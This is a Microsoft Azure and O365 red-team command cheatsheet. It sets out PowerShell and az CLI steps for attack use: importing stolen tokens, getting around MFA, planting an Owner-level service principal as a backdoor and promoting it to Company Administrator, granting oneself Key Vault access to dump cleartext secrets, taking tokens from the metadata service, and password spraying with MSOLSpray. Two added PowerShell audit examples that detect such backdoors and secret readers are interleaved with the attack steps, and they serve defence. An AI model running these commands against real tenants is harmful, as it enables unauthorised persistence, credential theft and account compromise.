Microsoft Azure & O365 CLI Tool Cheatsheet
By Beau Bullock (@dafthack)
Az PowerShell Module
Import-Module Az
Authentication
Connect-AzAccount
## Or this way sometimes gets around MFA restrictions
$credential = Get-Credential
Connect-AzAccount -Credential $credential
Import a context file
Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json'
Export a context file
Save-AzContext -Path C:\Temp\AzureAccessToken.json
Account Information
List the current Azure contexts available
Get-AzContext -ListAvailable
Get context details
$context = Get-AzContext
$context.Name
$context.Account
List subscriptions
Get-AzSubscription
Choose a subscription
Select-AzSubscription -SubscriptionID "SubscriptionID"
Get the current user's role assignment
Get-AzRoleAssignment
List all resources and resource groups
Get-AzResource
Get-AzResourceGroup
List storage accounts
Get-AzStorageAccount
WebApps & SQL
List Azure web applications
Get-AzAdApplication
Get-AzWebApp
List SQL servers
Get-AzSQLServer
Individual databases can be listed with information retrieved from the previous command
Get-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName
List SQL Firewall rules
Get-AzSqlServerFirewallRule -ServerName $ServerName -ResourceGroupName $ResourceGroupName
List SQL Server AD Admins
Get-AzSqlServerActiveDirectoryAdministrator -ServerName $ServerName -ResourceGroupName $ResourceGroupName
Runbooks
List Azure Runbooks
Get-AzAutomationAccount
Get-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName>
Export a runbook with:
Export-AzAutomationRunbook -AutomationAccountName $AccountName -ResourceGroupName $ResourceGroupName -Name $RunbookName -OutputFolder .\Desktop\
Virtual Machines
List VMs and get OS details
Get-AzVM
$vm = Get-AzVM -Name "VM Name"
$vm.OSProfile
Run commands on VMs
Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1
Networking
List virtual networks
Get-AzVirtualNetwork
List public IP addresses assigned to virtual NICs
Get-AzPublicIpAddress
Get Azure ExpressRoute (VPN) Info
Get-AzExpressRouteCircuit
Backdoors
Create a new Azure service principal as a backdoor
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$spn
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$UnsecureSecret
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
#Enter the AppID as username and what was returned for $UnsecureSecret as the password in the Get-Credential prompt
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant "tenant ID" -ServicePrincipal
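To audit a subscription for the kind of service principal created above, the filter below flags service principals that hold high-privilege roles at broad scope. It is an added example, not part of the original cheatsheet; the helper name Find-PrivilegedServicePrincipal, the role list and the sample records are constructed for illustration, and the records mirror the properties returned by Get-AzRoleAssignment.

```powershell
# Added example: flag service principals with high-privilege roles at broad scope.
# Find-PrivilegedServicePrincipal is a hypothetical helper, not an Az cmdlet.
function Find-PrivilegedServicePrincipal {
    [CmdletBinding()]
    param(
        # Objects shaped like Get-AzRoleAssignment output
        [Parameter(Mandatory, ValueFromPipeline)]
        [psobject]$Assignment,
        # Roles treated as high privilege (assumption; tune per environment)
        [string[]]$Role = @('Owner', 'Contributor', 'User Access Administrator')
    )
    process {
        if ($Assignment.ObjectType -ne 'ServicePrincipal') { return }
        if ($Assignment.RoleDefinitionName -notin $Role) { return }
        # Broad scope = root, a management group, or a whole subscription
        $broad = $Assignment.Scope -match ('^/$|^/subscriptions/[^/]+$|' +
            '^/providers/Microsoft\.Management/managementGroups/[^/]+$')
        if (-not $broad) { return }
        [pscustomobject]@{
            DisplayName = $Assignment.DisplayName
            ObjectId    = $Assignment.ObjectId
            Role        = $Assignment.RoleDefinitionName
            Scope       = $Assignment.Scope
        }
    }
}

# Constructed sample records (not real tenant data)
$sub = '/subscriptions/11111111-1111-1111-1111-111111111111'
$sample = @(
    [pscustomobject]@{ DisplayName = 'WebService'; ObjectType = 'ServicePrincipal'
        ObjectId = '00000000-0000-0000-0000-000000000001'
        RoleDefinitionName = 'Owner'; Scope = $sub }
    [pscustomobject]@{ DisplayName = 'build-agent'; ObjectType = 'ServicePrincipal'
        ObjectId = '00000000-0000-0000-0000-000000000002'
        RoleDefinitionName = 'Contributor'; Scope = "$sub/resourceGroups/rg-build" }
    [pscustomobject]@{ DisplayName = 'Alice Admin'; ObjectType = 'User'
        ObjectId = '00000000-0000-0000-0000-000000000003'
        RoleDefinitionName = 'Owner'; Scope = $sub }
)

# Only the 'WebService' record matches: service principal, Owner, subscription scope
$sample | Find-PrivilegedServicePrincipal | Format-Table -AutoSize

# Against a live subscription (requires the Az module and read access):
# Get-AzRoleAssignment | Find-PrivilegedServicePrincipal
```

Compare the results against an approved list of automation identities; a match with no known owner or change ticket is worth investigating.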
MSOnline PowerShell Module
Import-Module MSOnline
Authentication
Connect-MsolService
## Or this way sometimes gets around MFA restrictions
$credential = Get-Credential
Connect-MsolService -Credential $credential
Account and Directory Information
List Company Information
Get-MSolCompanyInformation
List all users
Get-MSolUser -All
List all groups
Get-MSolGroup -All
List members of a group (Global Admins in this case)
Get-MsolRole -RoleName "Company Administrator"
Get-MSolGroupMember -GroupObjectId $GUID
List all user attributes
Get-MSolUser -All | fl
List Service Principals
Get-MsolServicePrincipal
One-liner to search all Azure AD user attributes for passwords
$users = Get-MsolUser; foreach($user in $users){$props = @();$user | Get-Member | foreach-object{$props+=$_.Name}; foreach($prop in $props){if($user.$prop -like "*password*"){Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)}}}
Az CLI Tool
Authentication
az login
Dump Azure Key Vaults
List out any key vault resources the current account can view
az keyvault list --query '[].name' --output tsv
With contributor level access you can give yourself the right permissions to obtain secrets.
az keyvault set-policy --name <KeyVaultname> --upn <YourContributorUsername> --secret-permissions get list --key-permissions get list --storage-permissions get list --certificate-permissions get list
Get URI for Key Vault
az keyvault secret list --vault-name <KeyVaultName> --query '[].id' --output tsv
Get cleartext secret from keyvault
az keyvault secret show --id <URI from last command> | ConvertFrom-Json
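The set-policy step above only works on vaults that use the access-policy permission model; with Azure RBAC authorization enabled, access policies are not evaluated. The audit below is an added example, not part of the original cheatsheet: it reports vaults still on access policies and the principals whose policy allows reading secrets. The helper name Get-VaultSecretReader and the sample vaults are constructed, with objects shaped like the output of Get-AzKeyVault -VaultName.

```powershell
# Added example: list vaults on the access-policy model and who can read secrets.
# Get-VaultSecretReader is a hypothetical helper, not an Az cmdlet.
function Get-VaultSecretReader {
    [CmdletBinding()]
    param(
        # Objects shaped like the output of Get-AzKeyVault -VaultName <name>
        [Parameter(Mandatory, ValueFromPipeline)]
        [psobject]$Vault
    )
    process {
        # Vaults using Azure RBAC authorization ignore access policies; skip them
        if ($Vault.EnableRbacAuthorization) { return }
        foreach ($policy in $Vault.AccessPolicies) {
            # 'get' on secrets is what exposes cleartext secret values
            if ($policy.PermissionsToSecrets -contains 'get') {
                [pscustomobject]@{
                    Vault     = $Vault.VaultName
                    Principal = $policy.DisplayName
                    ObjectId  = $policy.ObjectId
                    Secrets   = $policy.PermissionsToSecrets -join ','
                }
            }
        }
    }
}

# Constructed sample vaults (not real tenant data)
$sample = @(
    [pscustomobject]@{
        VaultName = 'kv-legacy'; EnableRbacAuthorization = $false
        AccessPolicies = @(
            [pscustomobject]@{ DisplayName = 'ops-admin'
                ObjectId = '00000000-0000-0000-0000-00000000000a'
                PermissionsToSecrets = @('get', 'list') }
            [pscustomobject]@{ DisplayName = 'backup-job'
                ObjectId = '00000000-0000-0000-0000-00000000000b'
                PermissionsToSecrets = @('list') }
        )
    }
    [pscustomobject]@{ VaultName = 'kv-rbac'; EnableRbacAuthorization = $true
        AccessPolicies = @() }
)

# Only 'ops-admin' on 'kv-legacy' is reported
$sample | Get-VaultSecretReader | Format-Table -AutoSize

# Against a live subscription (requires the Az module and read access):
# Get-AzKeyVault | ForEach-Object { Get-AzKeyVault -VaultName $_.VaultName } | Get-VaultSecretReader
```

Running the audit on a schedule and comparing the output between runs shows when a new principal has been added to a vault's access policy.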
Metadata Service URL
http://169.254.169.254/metadata
Get access tokens from the metadata service
GET 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' HTTP/1.1 Metadata: true
Other Azure & O365 Tools
MicroBurst
Azure security assessment tool
https://github.com/NetSPI/MicroBurst
Look for open storage blobs
Invoke-EnumerateAzureBlobs -Base $BaseName
Export SSL/TLS certs
Get-AzPasswords -ExportCerts Y
Azure Container Registry dump
Get-AzPasswords
Get-AzACR
PowerZure
Azure security assessment tool
https://github.com/hausec/PowerZure
ROADTools
Framework to interact with Azure AD
https://github.com/dirkjanm/ROADtools
Stormspotter
Red team tool for graphing Azure and Azure AD objects
https://github.com/Azure/Stormspotter
MSOLSpray
Tool to password spray Azure/O365
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020
Top comments (1)
Penetration testing companies can provide you with the expertise and resources you need to test your Azure environment and identify any security vulnerabilities. They will work with you to develop a custom testing plan that meets your specific needs and budget.